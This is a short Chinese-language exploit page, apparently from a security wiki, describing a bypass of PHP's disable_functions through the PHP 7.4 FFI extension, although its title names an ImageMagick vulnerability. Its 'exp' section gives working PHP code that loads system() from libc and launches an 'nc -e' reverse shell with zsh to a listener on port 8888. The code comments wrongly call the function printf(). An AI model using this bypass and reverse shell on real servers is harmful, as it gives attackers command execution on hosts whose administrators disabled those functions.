利用 ImageMagick 漏洞绕过(二)

1.利用条件

php 7.4 ffi.enable=true

2.基本原理

FFI(Foreign Function Interface),即外部函数接口,允许从用户区调用C代码。 当PHP所有的命令执行函数被禁用后,通过PHP 7.4的新特性FFI可以实现用PHP代码调用C代码的方式,先声明C中的命令执行函数,然后再通过FFI变量调用该C函数即可Bypass disable_functions。

image

3.exp

<?php
// create FFI object, loading libc and exporting function printf()
$ffi = FFI::cdef(
   "int system(char *command);", // this is a regular C declaration
   "libc.so.6");
// call C's printf()
$a='nc -e /usr/bin/zsh 127.0.0.1 8888';
$ffi->system($a);
?>
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-28 12:32:55

results matching ""

    No results matching ""